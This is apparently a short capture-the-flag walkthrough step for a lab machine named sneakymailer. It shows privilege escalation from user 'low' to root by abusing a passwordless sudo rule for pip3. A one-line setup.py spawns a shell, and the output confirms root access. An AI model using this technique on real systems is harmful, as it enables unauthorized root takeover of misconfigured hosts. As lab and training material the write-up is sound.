10 privesc low > root

low@sneakymailer:/opt/scripts/low$ ls -la
total 16
drwxr-x--- 2 root low  4096 Jun 23  2020 .
drwxr-xr-x 5 root root 4096 May 26  2020 ..
-rwxr-x--- 1 root low    71 Jun  8  2020 install-module.sh
-rwxr-x--- 1 root low  1812 Jun 23  2020 install-modules.py

# we can read and execute
low@sneakymailer:/opt/scripts/low$ cat install-module.sh
#!/bin/bash

# install the module
/home/low/venv/bin/python $1 install

# install-modues.py
basically extracts the packkage and runs it, thats how we get shell for low.

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
	
Using https://gtfobins.github.io/gtfobins/pip/#sudo

low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo /usr/bin/pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.PZyCPyQge6
# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
sneakymailer

Last updated